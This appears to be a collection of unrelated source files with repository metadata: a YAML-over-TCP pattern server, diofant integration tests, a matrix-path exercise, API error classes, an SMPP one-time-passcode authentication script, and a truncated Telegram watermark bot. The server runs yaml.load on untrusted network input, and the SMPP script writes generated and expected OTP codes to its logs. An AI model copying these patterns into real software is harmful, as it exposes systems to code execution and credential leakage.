"MIT"
] | null | null | null |
python/pattern_server/pattern_server.py
|
multispot-software/LCOS_LabVIEW
|
bbf5653203bb734d1d2d1b31c7f65f309545de7a
|
[
"MIT"
] | 3
|
2018-10-30T21:06:20.000Z
|
2020-03-27T08:14:41.000Z
|
#! python3
import socketserver
import yaml
from patternlib import compute_pattern
def process_recv_data(data):
#print(data)
params = yaml.load(data)
print(params, end='\n\n')
a = compute_pattern(**params)
return a.tobytes()
class MyTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.request.recv(1024).strip()
print("- Data received.")
response = process_recv_data(self.data)
self.request.sendall(response)
def main():
HOST, PORT = "localhost", 9999
server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
print('Serving...')
server.serve_forever()
if __name__ == "__main__":
main()
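# --- Hedged client-side sketch (added for illustration; not part of the original script) ---
# The handler above expects one YAML-encoded parameter mapping (read in a single 1024-byte
# recv) and answers with the raw bytes of the computed pattern, closing the connection when
# done. The keyword names accepted by compute_pattern are not shown here, so `params` is a
# placeholder dict supplied by the caller.
def example_request(params, host="localhost", port=9999):
    import socket
    with socket.create_connection((host, port)) as sock:
        sock.sendall(yaml.dump(params).encode())
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:  # server closes the connection once the response is sent
                break
            chunks.append(chunk)
    return b"".join(chunks)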
| 25.4
| 64
| 0.674541
|
65c53b27289fd5871d29010d2829ae92d255bf4d
| 9,467
|
py
|
Python
|
diofant/tests/integrals/test_rde.py
|
rajkk1/diofant
|
6b361334569e4ec2e8c7d30dc324387a4ad417c2
|
[
"BSD-3-Clause"
] | 57
|
2016-09-13T23:16:26.000Z
|
2022-03-29T06:45:51.000Z
|
diofant/tests/integrals/test_rde.py
|
rajkk1/diofant
|
6b361334569e4ec2e8c7d30dc324387a4ad417c2
|
[
"BSD-3-Clause"
] | 402
|
2016-05-11T11:11:47.000Z
|
2022-03-31T14:27:02.000Z
|
diofant/tests/integrals/test_rde.py
|
rajkk1/diofant
|
6b361334569e4ec2e8c7d30dc324387a4ad417c2
|
[
"BSD-3-Clause"
] | 20
|
2016-05-11T08:17:37.000Z
|
2021-09-10T09:15:51.000Z
|
"""Most of these tests come from the examples in Bronstein's book."""
import pytest
from diofant import I, Poly, Rational, oo, symbols
from diofant.abc import k, n, t, x, z
from diofant.integrals.rde import (bound_degree, cancel_exp, cancel_primitive,
no_cancel_equal, normal_denom, order_at,
order_at_oo, rischDE, solve_poly_rde, spde,
special_denom, weak_normalizer)
from diofant.integrals.risch import (DifferentialExtension,
NonElementaryIntegralException)
__all__ = ()
t0, t1, t2 = symbols('t:3')
def test_order_at():
a = Poly(t**4, t)
b = Poly((t**2 + 1)**3*t, t)
c = Poly((t**2 + 1)**6*t, t)
d = Poly((t**2 + 1)**10*t**10, t)
e = Poly((t**2 + 1)**100*t**37, t)
p1 = Poly(t, t)
p2 = Poly(1 + t**2, t)
assert order_at(a, p1, t) == 4
assert order_at(b, p1, t) == 1
assert order_at(c, p1, t) == 1
assert order_at(d, p1, t) == 10
assert order_at(e, p1, t) == 37
assert order_at(a, p2, t) == 0
assert order_at(b, p2, t) == 3
assert order_at(c, p2, t) == 6
assert order_at(d, p1, t) == 10
assert order_at(e, p2, t) == 100
assert order_at(Poly(0, t), Poly(t, t), t) == oo
assert order_at_oo(Poly(t**2 - 1, t), Poly(t + 1), t) == \
order_at_oo(Poly(t - 1, t), Poly(1, t), t) == -1
assert order_at_oo(Poly(0, t), Poly(1, t), t) == oo
def test_weak_normalizer():
a = Poly((1 + x)*t**5 + 4*t**4 + (-1 - 3*x)*t**3 - 4*t**2 + (-2 + 2*x)*t, t)
d = Poly(t**4 - 3*t**2 + 2, t)
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
r = weak_normalizer(a, d, DE, z)
assert r == (Poly(t**5 - t**4 - 4*t**3 + 4*t**2 + 4*t - 4, t),
(Poly((1 + x)*t**2 + x*t, t), Poly(t + 1, t)))
assert weak_normalizer(r[1][0], r[1][1], DE) == (Poly(1, t), r[1])
r = weak_normalizer(Poly(1 + t**2), Poly(t**2 - 1, t), DE, z)
assert r == (Poly(t**4 - 2*t**2 + 1, t), (Poly(-3*t**2 + 1, t), Poly(t**2 - 1, t)))
assert weak_normalizer(r[1][0], r[1][1], DE, z) == (Poly(1, t), r[1])
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1 + t**2)]})
r = weak_normalizer(Poly(1 + t**2), Poly(t, t), DE, z)
assert r == (Poly(t, t), (Poly(0, t), Poly(1, t)))
assert weak_normalizer(r[1][0], r[1][1], DE, z) == (Poly(1, t), r[1])
def test_normal_denom():
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
pytest.raises(NonElementaryIntegralException, lambda: normal_denom(Poly(1, x), Poly(1, x),
Poly(1, x), Poly(x, x), DE))
fa, fd = Poly(t**2 + 1, t), Poly(1, t)
ga, gd = Poly(1, t), Poly(t**2, t)
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert normal_denom(fa, fd, ga, gd, DE) == \
(Poly(t, t), (Poly(t**3 - t**2 + t - 1, t), Poly(1, t)), (Poly(1, t),
Poly(1, t)), Poly(t, t))
def test_special_denom():
# TODO: add more tests here
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
assert special_denom(Poly(1, t), Poly(t**2, t), Poly(1, t), Poly(t**2 - 1, t),
Poly(t, t), DE) == \
(Poly(1, t), Poly(t**2 - 1, t), Poly(t**2 - 1, t), Poly(t, t))
# assert special_denom(Poly(1, t), Poly(2*x, t), Poly((1 + 2*x)*t, t), DE) == 1
# issue sympy/sympy#3940
# Note, this isn't a very good test, because the denominator is just 1,
# but at least it tests the exp cancellation case
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(-2*x*t0, t0),
Poly(I*k*t1, t1)]})
DE.decrement_level()
assert special_denom(Poly(1, t0), Poly(I*k, t0), Poly(1, t0), Poly(t0, t0),
Poly(1, t0), DE) == \
(Poly(1, t0), Poly(I*k, t0), Poly(t0, t0), Poly(1, t0))
@pytest.mark.xfail
def test_bound_degree_fail():
# Primitive
DE = DifferentialExtension(extension={'D': [Poly(1, x),
Poly(t0/x**2, t0), Poly(1/x, t)]})
assert bound_degree(Poly(t**2, t), Poly(-(1/x**2*t**2 + 1/x), t),
Poly((2*x - 1)*t**4 + (t0 + x)/x*t**3 - (t0 + 4*x**2)/2*x*t**2 + x*t,
t), DE) == 3
def test_bound_degree():
# Base
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert bound_degree(Poly(1, x), Poly(-2*x, x), Poly(1, x), DE) == 0
# Primitive (see above test_bound_degree_fail)
# TODO: Add test for when the degree bound becomes larger after limited_integrate
# TODO: Add test for db == da - 1 case
# Exp
# TODO: Add tests
# TODO: Add test for when the degree becomes larger after parametric_log_deriv()
# Nonlinear
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert bound_degree(Poly(t, t), Poly((t - 1)*(t**2 + 1), t), Poly(1, t), DE) == 0
def test_spde():
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
pytest.raises(NonElementaryIntegralException, lambda: spde(Poly(t, t), Poly((t - 1)*(t**2 + 1), t), Poly(1, t), 0, DE))
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
assert spde(Poly(t**2 + x*t*2 + x**2, t), Poly(t**2/x**2 + (2/x - 1)*t, t),
Poly(t**2/x**2 + (2/x - 1)*t, t), 0, DE) == \
(Poly(0, t), Poly(0, t), 0, Poly(0, t), Poly(1, t))
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t0/x**2, t0), Poly(1/x, t)]})
assert spde(Poly(t**2, t), Poly(-t**2/x**2 - 1/x, t),
Poly((2*x - 1)*t**4 + (t0 + x)/x*t**3 - (t0 + 4*x**2)/(2*x)*t**2 + x*t, t), 3, DE) == \
(Poly(0, t), Poly(0, t), 0, Poly(0, t),
Poly(t0*t**2/2 + x**2*t**2 - x**2*t, t))
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert spde(Poly(x**2 + x + 1, x), Poly(-2*x - 1, x), Poly(x**5/2 +
3*x**4/4 + x**3 - x**2 + 1, x), 4, DE) == \
(Poly(0, x), Poly(x/2 - Rational(1, 4), x), 2, Poly(x**2 + x + 1, x), Poly(5*x/4, x))
assert spde(Poly(x**2 + x + 1, x), Poly(-2*x - 1, x), Poly(x**5/2 +
3*x**4/4 + x**3 - x**2 + 1, x), n, DE) == \
(Poly(0, x), Poly(x/2 - Rational(1, 4), x), -2 + n, Poly(x**2 + x + 1, x), Poly(5*x/4, x))
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1, t)]})
pytest.raises(NonElementaryIntegralException, lambda: spde(Poly((t - 1)*(t**2 + 1)**2, t), Poly((t - 1)*(t**2 + 1), t), Poly(1, t), 0, DE))
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert spde(Poly(x**2 - x, x), Poly(1, x), Poly(9*x**4 - 10*x**3 + 2*x**2, x), 4, DE) == (Poly(0, x), Poly(0, x), 0, Poly(0, x), Poly(3*x**3 - 2*x**2, x))
assert spde(Poly(x**2 - x, x), Poly(x**2 - 5*x + 3, x), Poly(x**7 - x**6 - 2*x**4 + 3*x**3 - x**2, x), 5, DE) == \
(Poly(1, x), Poly(x + 1, x), 1, Poly(x**4 - x**3, x), Poly(x**3 - x**2, x))
def test_solve_poly_rde_no_cancel():
# deg(b) large
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1 + t**2, t)]})
assert solve_poly_rde(Poly(t**2 + 1, t), Poly(t**3 + (x + 1)*t**2 + t + x + 2, t),
oo, DE) == Poly(t + x, t)
# deg(b) small
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert solve_poly_rde(Poly(0, x), Poly(x/2 - Rational(1, 4), x), oo, DE) == \
Poly(x**2/4 - x/4, x)
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert solve_poly_rde(Poly(2, t), Poly(t**2 + 2*t + 3, t), 1, DE) == \
Poly(t + 1, t, x)
# deg(b) == deg(D) - 1
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert no_cancel_equal(Poly(1 - t, t),
Poly(t**3 + t**2 - 2*x*t - 2*x, t), oo, DE) == \
(Poly(t**2, t), 1, Poly((-2 - 2*x)*t - 2*x, t))
def test_solve_poly_rde_cancel():
# exp
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
assert cancel_exp(Poly(2*x, t), Poly(2*x, t), 0, DE) == \
Poly(1, t)
assert cancel_exp(Poly(2*x, t), Poly((1 + 2*x)*t, t), 1, DE) == \
Poly(t, t)
# TODO: Add more exp tests, including tests that require is_deriv_in_field()
# primitive
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})
# If the DecrementLevel context manager is working correctly, this shouldn't
# cause any problems with the further tests.
pytest.raises(NonElementaryIntegralException, lambda: cancel_primitive(Poly(1, t), Poly(t, t), oo, DE))
assert cancel_primitive(Poly(1, t), Poly(t + 1/x, t), 2, DE) == \
Poly(t, t)
assert cancel_primitive(Poly(4*x, t), Poly(4*x*t**2 + 2*t/x, t), 3, DE) == \
Poly(t**2, t)
# TODO: Add more primitive tests, including tests that require is_deriv_in_field()
def test_rischDE():
# TODO: Add more tests for rischDE, including ones from the text
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
DE.decrement_level()
assert rischDE(Poly(-2*x, x), Poly(1, x), Poly(1 - 2*x - 2*x**2, x),
Poly(1, x), DE) == \
(Poly(x + 1, x), Poly(1, x))
| 48.055838
| 158
| 0.509665
|
abf8001abf419f12bb86552f235a6560342c4b26
| 1,610
|
py
|
Python
|
src/practices/practice/max_path _sum/script.py
|
rahul38888/coding_practice
|
8445c379310aa189147c4805c43bed80aa9e9fac
|
[
"Apache-2.0"
] | 1
|
2021-08-06T11:22:12.000Z
|
2021-08-06T11:22:12.000Z
|
src/practices/practice/max_path _sum/script.py
|
rahul38888/coding_practice
|
8445c379310aa189147c4805c43bed80aa9e9fac
|
[
"Apache-2.0"
] | null | null | null |
src/practices/practice/max_path _sum/script.py
|
rahul38888/coding_practice
|
8445c379310aa189147c4805c43bed80aa9e9fac
|
[
"Apache-2.0"
] | null | null | null |
# https://practice.geeksforgeeks.org/problems/path-in-matrix3805/1
# Approach is to iterate over each 0th row element and try to find the max path from there
# for any index save the longest cost path from there and reuse it
class Solution:
def recMaximumPath(self, N, m, index, cache):
if index[0] == N-1:
if cache[index[0]][index[1]] is None:
cache[index[0]][index[1]] = m[index[0]][index[1]]
return cache[index[0]][index[1]]
if cache[index[0]][index[1]] is not None:
return cache[index[0]][index[1]]
max_cost = 0
r = index[0]
c = index[1]
max_cost = max(max_cost,self.recMaximumPath(N, m, (r+1, c), cache))
if c-1 >= 0:
max_cost = max(max_cost,self.recMaximumPath(N, m, (r+1, c-1), cache))
if c+1 < N:
max_cost = max(max_cost,self.recMaximumPath(N, m, (r+1, c+1), cache))
cache[index[0]][index[1]] = max_cost + m[index[0]][index[1]]
return cache[index[0]][index[1]]
def maximumPath(self, N, Matrix):
cache = [[None for i in range(N)] for i in range(N)]
max_cost = 0
for i in range(N):
max_cost = max(max_cost,self.recMaximumPath(N, Matrix,(0,i),cache))
return max_cost
if __name__ == '__main__':
t = int (input ())
for _ in range (t):
N = int(input())
arr = input().split()
Matrix = [[0]*N for i in range(N)]
for itr in range(N*N):
Matrix[(itr//N)][itr%N] = int(arr[itr])
ob = Solution()
print(ob.maximumPath(N, Matrix))
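# A quick sanity check of the memoized recursion above; the helper name and the
# 2x2 input are illustrative only and not part of the original exercise.
def _maximum_path_demo():
    # From (r, c) the path may move to (r+1, c-1), (r+1, c) or (r+1, c+1),
    # so for [[1, 2], [3, 4]] the best path is 2 -> 4 with total cost 6.
    return Solution().maximumPath(2, [[1, 2], [3, 4]])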
| 33.541667
| 90
| 0.557143
|
8ff9e22a75b6e29f339ba26dddde9b19e93abc82
| 2,652
|
py
|
Python
|
www/apis.py
|
xiaozefeng/python3-webapp
|
126f93179186bcf6adf360c0fba3ab51baa4ca19
|
[
"MIT"
] | null | null | null |
www/apis.py
|
xiaozefeng/python3-webapp
|
126f93179186bcf6adf360c0fba3ab51baa4ca19
|
[
"MIT"
] | null | null | null |
www/apis.py
|
xiaozefeng/python3-webapp
|
126f93179186bcf6adf360c0fba3ab51baa4ca19
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'steven'
'''
JSON API definition.
'''
import json, logging, inspect, functools
class Page(object):
'''
Page object for display pages.
'''
def __init__(self, item_count, page_index=1, page_size=10):
'''
Init Pagination by item_count, page_index and page_size.
>>> p1 = Page(100, 1)
>>> p1.page_count
10
>>> p1.offset
0
>>> p1.limit
10
>>> p2 = Page(90, 9, 10)
>>> p2.page_count
9
>>> p2.offset
80
>>> p2.limit
10
>>> p3 = Page(91, 10, 10)
>>> p3.page_count
10
>>> p3.offset
90
>>> p3.limit
10
'''
self.item_count = item_count
self.page_size = page_size
self.page_count = item_count // page_size + (1 if item_count % page_size > 0 else 0)
if (item_count == 0) or (page_index > self.page_count):
self.offset = 0
self.limit = 0
self.page_index = 1
else:
self.page_index = page_index
self.offset = self.page_size * (page_index - 1)
self.limit = self.page_size
self.has_next = self.page_index < self.page_count
self.has_previous = self.page_index > 1
def __str__(self):
return 'item_count: %s, page_count: %s, page_index: %s, page_size: %s, offset: %s, limit: %s' % (self.item_count, self.page_count, self.page_index, self.page_size, self.offset, self.limit)
__repr__ = __str__
class APIError(Exception):
'''
the base APIError which contains error(required), data(optional) and message(optional).
'''
def __init__(self, error, data='', message=''):
super(APIError, self).__init__(message)
self.error = error
self.data = data
self.message = message
class APIValueError(APIError):
'''
Indicate the input value has an error or is invalid. The data specifies the error field of the input form.
'''
def __init__(self, field, message):
super(APIValueError,self).__init__('value:invalid', field, message)
class APIResourceNotFoundError(APIError):
'''
Indicate the resource was not found. The data specifies the resource name.
'''
def __init__(self, field, message=''):
super(APIResourceNotFoundError, self).__init__('value:notfound', field, message)
class APIPermissionError(APIError):
'''
Indicate the API has no permission.
'''
def __init__(self, message= ''):
super(APIPermissionError, self).__init__('permission:forbidden', 'permission', message)
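# A brief usage sketch of the error hierarchy above; the field, message and
# helper name are hypothetical, for illustration only.
def _api_error_demo():
    try:
        raise APIValueError('email', 'Invalid email address.')
    except APIError as e:
        # -> value:invalid email Invalid email address.
        return '%s %s %s' % (e.error, e.data, e.message)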
| 27.625
| 196
| 0.592383
|
828550264cd13d6cdafa6dea1649bf77dcf660d8
| 16,464
|
py
|
Python
|
server/integrations/smpp/smpp2FA.py
|
duttarnab/jans-auth-server
|
c74d4b1056cc6ae364dee1d3b89121925a3dcd0b
|
[
"Apache-2.0"
] | 30
|
2020-10-08T07:42:25.000Z
|
2022-01-14T08:28:54.000Z
|
server/integrations/smpp/smpp2FA.py
|
duttarnab/jans-auth-server
|
c74d4b1056cc6ae364dee1d3b89121925a3dcd0b
|
[
"Apache-2.0"
] | 339
|
2020-10-23T19:07:38.000Z
|
2022-01-14T08:27:47.000Z
|
server/integrations/smpp/smpp2FA.py
|
duttarnab/jans-auth-server
|
c74d4b1056cc6ae364dee1d3b89121925a3dcd0b
|
[
"Apache-2.0"
] | 17
|
2020-10-07T17:23:59.000Z
|
2022-01-14T09:28:21.000Z
|
# Janssen Project software is available under the Apache License (2004). See http://www.apache.org/licenses/ for full text.
# Copyright (c) 2020, Janssen Project
# Copyright (c) 2019, Tele2
# Author: Jose Gonzalez
# Author: Gasmyr Mougang
# Author: Stefan Andersson
from java.util import Arrays, Date
from java.io import IOException
from java.lang import Enum
from io.jans.service.cdi.util import CdiUtil
from io.jans.as.server.security import Identity
from io.jans.model.custom.script.type.auth import PersonAuthenticationType
from io.jans.as.server.service import AuthenticationService
from io.jans.as.server.service.common import UserService
from io.jans.as.server.util import ServerUtil
from io.jans.util import StringHelper, ArrayHelper
from javax.faces.application import FacesMessage
from io.jans.jsf2.message import FacesMessages
from org.jsmpp import InvalidResponseException, PDUException
from org.jsmpp.bean import Alphabet, BindType, ESMClass, GeneralDataCoding, MessageClass, NumberingPlanIndicator, RegisteredDelivery, SMSCDeliveryReceipt, TypeOfNumber
from org.jsmpp.extra import NegativeResponseException, ResponseTimeoutException
from org.jsmpp.session import BindParameter, SMPPSession
from org.jsmpp.util import AbsoluteTimeFormatter, TimeFormatter
import random
class SmppAttributeError(Exception):
pass
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
self.identity = CdiUtil.bean(Identity)
def get_and_parse_smpp_config(self, config, attribute, _type = None, convert = False, optional = False, default_desc = None):
try:
value = config.get(attribute).getValue2()
except:
if default_desc:
default_desc = " using default '{}'".format(default_desc)
else:
default_desc = ""
if optional:
raise SmppAttributeError("SMPP missing optional configuration attribute '{}'{}".format(attribute, default_desc))
else:
raise SmppAttributeError("SMPP missing required configuration attribute '{}'".format(attribute))
if _type and issubclass(_type, Enum):
try:
return getattr(_type, value)
except AttributeError:
raise SmppAttributeError("SMPP could not find attribute '{}' in {}".format(attribute, _type))
if convert:
try:
value = int(value)
except AttributeError:
try:
value = int(value, 16)
except AttributeError:
raise SmppAttributeError("SMPP could not parse value '{}' of attribute '{}'".format(value, attribute))
return value
def init(self, customScript, configurationAttributes):
print("SMPP Initialization")
self.TIME_FORMATTER = AbsoluteTimeFormatter()
self.SMPP_SERVER = None
self.SMPP_PORT = None
self.SYSTEM_ID = None
self.PASSWORD = None
# Setup some good defaults for TON, NPI and source (from) address
# TON (Type of Number), NPI (Number Plan Indicator)
self.SRC_ADDR_TON = TypeOfNumber.ALPHANUMERIC # Alphanumeric
self.SRC_ADDR_NPI = NumberingPlanIndicator.ISDN # ISDN (E163/E164)
self.SRC_ADDR = "Gluu OTP"
# Don't touch these unless you know what you're doing; we don't handle number reformatting for
# any type other than international.
self.DST_ADDR_TON = TypeOfNumber.INTERNATIONAL # International
self.DST_ADDR_NPI = NumberingPlanIndicator.ISDN # ISDN (E163/E164)
# Priority flag and data_coding bits
self.PRIORITY_FLAG = 3 # Very Urgent (ANSI-136), Emergency (IS-95)
self.DATA_CODING_ALPHABET = Alphabet.ALPHA_DEFAULT # SMS default alphabet
self.DATA_CODING_MESSAGE_CLASS = MessageClass.CLASS1 # ME-specific (Mobile Equipment, mobile memory), normal message
# Required server settings
try:
self.SMPP_SERVER = self.get_and_parse_smpp_config(configurationAttributes, "smpp_server")
except SmppAttributeError as e:
print(e)
try:
self.SMPP_PORT = self.get_and_parse_smpp_config(configurationAttributes, "smpp_port", convert = True)
except SmppAttributeError as e:
print(e)
if None in (self.SMPP_SERVER, self.SMPP_PORT):
print("SMPP smpp_server and smpp_port is empty, will not enable SMPP service")
return False
# Optional system_id and password for bind auth
try:
self.SYSTEM_ID = self.get_and_parse_smpp_config(configurationAttributes, "system_id", optional = True)
except SmppAttributeError as e:
print(e)
try:
self.PASSWORD = self.get_and_parse_smpp_config(configurationAttributes, "password", optional = True)
except SmppAttributeError as e:
print(e)
if None in (self.SYSTEM_ID, self.PASSWORD):
print("SMPP Authentication disabled")
# From number and to number settings
try:
self.SRC_ADDR_TON = self.get_and_parse_smpp_config(
configurationAttributes,
"source_addr_ton",
_type = TypeOfNumber,
optional = True,
default_desc = self.SRC_ADDR_TON
)
except SmppAttributeError as e:
print(e)
try:
self.SRC_ADDR_NPI = self.get_and_parse_smpp_config(
configurationAttributes,
"source_addr_npi",
_type = NumberingPlanIndicator,
optional = True,
default_desc = self.SRC_ADDR_NPI
)
except SmppAttributeError as e:
print(e)
try:
self.SRC_ADDR = self.get_and_parse_smpp_config(
configurationAttributes,
"source_addr",
optional = True,
default_desc = self.SRC_ADDR
)
except SmppAttributeError as e:
print(e)
try:
self.DST_ADDR_TON = self.get_and_parse_smpp_config(
configurationAttributes,
"dest_addr_ton",
_type = TypeOfNumber,
optional = True,
default_desc = self.DST_ADDR_TON
)
except SmppAttributeError as e:
print(e)
try:
self.DST_ADDR_NPI = self.get_and_parse_smpp_config(
configurationAttributes,
"dest_addr_npi",
_type = NumberingPlanIndicator,
optional = True,
default_desc = self.DST_ADDR_NPI
)
except SmppAttributeError as e:
print(e)
# Priority flag and data coding; don't touch these unless you know what you're doing...
try:
self.PRIORITY_FLAG = self.get_and_parse_smpp_config(
configurationAttributes,
"priority_flag",
convert = True,
optional = True,
default_desc = "3 (Very Urgent, Emergency)"
)
except SmppAttributeError as e:
print(e)
try:
self.DATA_CODING_ALPHABET = self.get_and_parse_smpp_config(
configurationAttributes,
"data_coding_alphabet",
_type = Alphabet,
optional = True,
default_desc = self.DATA_CODING_ALPHABET
)
except SmppAttributeError as e:
print(e)
try:
self.DATA_CODING_MESSAGE_CLASS = self.get_and_parse_smpp_config(
configurationAttributes,
"data_coding_alphabet",
_type = MessageClass,
optional = True,
default_desc = self.DATA_CODING_MESSAGE_CLASS
)
except SmppAttributeError as e:
print(e)
print("SMPP Initialized successfully")
return True
def destroy(self, configurationAttributes):
print("SMPP Destroy")
print("SMPP Destroyed successfully")
return True
def getApiVersion(self):
return 11
def getAuthenticationMethodClaims(self, requestParameters):
return None
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
userService = CdiUtil.bean(UserService)
authenticationService = CdiUtil.bean(AuthenticationService)
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
session_attributes = self.identity.getSessionId().getSessionAttributes()
form_passcode = ServerUtil.getFirstValue(requestParameters, "passcode")
print("SMPP form_response_passcode: {}".format(str(form_passcode)))
if step == 1:
print("SMPP Step 1 Password Authentication")
credentials = self.identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
logged_in = False
if StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password):
logged_in = authenticationService.authenticate(user_name, user_password)
if not logged_in:
return False
# Get the Person's number and generate a code
foundUser = None
try:
foundUser = authenticationService.getAuthenticatedUser()
except:
print("SMPP Error retrieving user {} from LDAP".format(user_name))
return False
mobile_number = None
try:
isVerified = foundUser.getAttribute("phoneNumberVerified")
if isVerified:
mobile_number = foundUser.getAttribute("employeeNumber")
if not mobile_number:
mobile_number = foundUser.getAttribute("mobile")
if not mobile_number:
mobile_number = foundUser.getAttribute("telephoneNumber")
if not mobile_number:
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Failed to determine mobile phone number")
print("SMPP Error finding mobile number for user '{}'".format(user_name))
return False
except Exception as e:
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Failed to determine mobile phone number")
print("SMPP Error finding mobile number for {}: {}".format(user_name, e))
return False
# Generate Random six digit code
code = random.randint(100000, 999999)
# Get code and save it in LDAP temporarily with special session entry
self.identity.setWorkingParameter("code", code)
self.identity.setWorkingParameter("mobile_number", mobile_number)
self.identity.getSessionId().getSessionAttributes().put("mobile_number", mobile_number)
if not self.sendMessage(mobile_number, str(code)):
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Failed to send message to mobile phone")
return False
return True
elif step == 2:
# Retrieve the session attribute
print("SMPP Step 2 SMS/OTP Authentication")
code = session_attributes.get("code")
print("SMPP Code: {}".format(str(code)))
if code is None:
print("SMPP Failed to find previously sent code")
return False
if form_passcode is None:
print("SMPP Passcode is empty")
return False
if len(form_passcode) != 6:
print("SMPP Passcode from response is not 6 digits: {}".format(form_passcode))
return False
if form_passcode == code:
print("SMPP SUCCESS! User entered the same code!")
return True
print("SMPP failed, user entered the wrong code! {} != {}".format(form_passcode, code))
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Incorrect SMS code, please try again.")
return False
print("SMPP ERROR: step param not found or != (1|2)")
return False
def prepareForStep(self, configurationAttributes, requestParameters, step):
if step == 1:
print("SMPP Prepare for Step 1")
return True
elif step == 2:
print("SMPP Prepare for Step 2")
return True
return False
def getExtraParametersForStep(self, configurationAttributes, step):
if step == 2:
return Arrays.asList("code")
return None
def getCountAuthenticationSteps(self, configurationAttributes):
return 2
def getPageForStep(self, configurationAttributes, step):
if step == 2:
return "/auth/otp_sms/otp_sms.xhtml"
return ""
def getNextStep(self, configurationAttributes, requestParameters, step):
return -1
def getLogoutExternalUrl(self, configurationAttributes, requestParameters):
print "Get external logout URL call"
return None
def logout(self, configurationAttributes, requestParameters):
return True
def sendMessage(self, number, code):
status = False
session = SMPPSession()
session.setTransactionTimer(10000)
# We only handle international destination number reformatting.
# All others may vary by configuration decisions taken on SMPP
# server side which we have no clue about.
if self.DST_ADDR_TON == TypeOfNumber.INTERNATIONAL and number.startswith("+"):
number = number[1:]
try:
print("SMPP Connecting")
reference_id = session.connectAndBind(
self.SMPP_SERVER,
self.SMPP_PORT,
BindParameter(
BindType.BIND_TX,
self.SYSTEM_ID,
self.PASSWORD,
None,
self.SRC_ADDR_TON,
self.SRC_ADDR_NPI,
None
)
)
print("SMPP Connected to server with system id {}".format(reference_id))
try:
message_id = session.submitShortMessage(
"CMT",
self.SRC_ADDR_TON,
self.SRC_ADDR_NPI,
self.SRC_ADDR,
self.DST_ADDR_TON,
self.DST_ADDR_NPI,
number,
ESMClass(),
0,
self.PRIORITY_FLAG,
self.TIME_FORMATTER.format(Date()),
None,
RegisteredDelivery(SMSCDeliveryReceipt.DEFAULT),
0,
GeneralDataCoding(
self.DATA_CODING_ALPHABET,
self.DATA_CODING_MESSAGE_CLASS,
False
),
0,
code
)
print("SMPP Message '{}' sent to #{} with message id {}".format(code, number, message_id))
status = True
except PDUException as e:
print("SMPP Invalid PDU parameter: {}".format(e))
except ResponseTimeoutException as e:
print("SMPP Response timeout: {}".format(e))
except InvalidResponseException as e:
print("SMPP Receive invalid response: {}".format(e))
except NegativeResponseException as e:
print("SMPP Receive negative response: {}".format(e))
except IOException as e:
print("SMPP IO error occured: {}".format(e))
finally:
session.unbindAndClose()
except IOException as e:
print("SMPP Failed connect and bind to host: {}".format(e))
return status
| 37.848276
| 167
| 0.599551
|
b80a9efe6a9cec153604e620450ba8f39414b7bd
| 2,820
|
py
|
Python
|
telewater/bot.py
|
someoneonearthwholovestg/telewater
|
ced6810f60b6070d6de4637450a1ea87076e9b1d
|
[
"MIT"
] | 1
|
2021-04-26T07:12:47.000Z
|
2021-04-26T07:12:47.000Z
|
telewater/bot.py
|
someoneonearthwholovestg/telewater
|
ced6810f60b6070d6de4637450a1ea87076e9b1d
|
[
"MIT"
] | null | null | null |
telewater/bot.py
|
someoneonearthwholovestg/telewater
|
ced6810f60b6070d6de4637450a1ea87076e9b1d
|
[
"MIT"
] | null | null | null |
''' This module defines the functions that handle different events.
'''
import os
import logging
from telethon import TelegramClient, events
from telewater.settings import API_ID, API_HASH, HELP, X_OFF, Y_OFF
from telewater.watermark import watermark
from telewater.utils import download_image, get_args
# TODO: (optional) send logs to attached logs channel
async def start(event):
# TODO: authentication for admins and users via deep linking, or "enter your access code"
await event.respond('Hi! I am alive.')
raise events.StopPropagation
async def bot_help(event):
try:
await event.respond(HELP)
finally:
raise events.StopPropagation
async def set_image(event):
# TODO: accept images directly besides urls
# TODO: show preview on different sizes
# TODO: allow image resize / compress / transparent background
try:
image_url = get_args(event.message.text)
# TODO: if args are empty, ask follow up question to get user-input
download_image(image_url, 'image.png')
await event.respond('Done')
finally:
raise events.StopPropagation
async def set_pos(event):
try:
pos_arg = get_args(event.message.text)
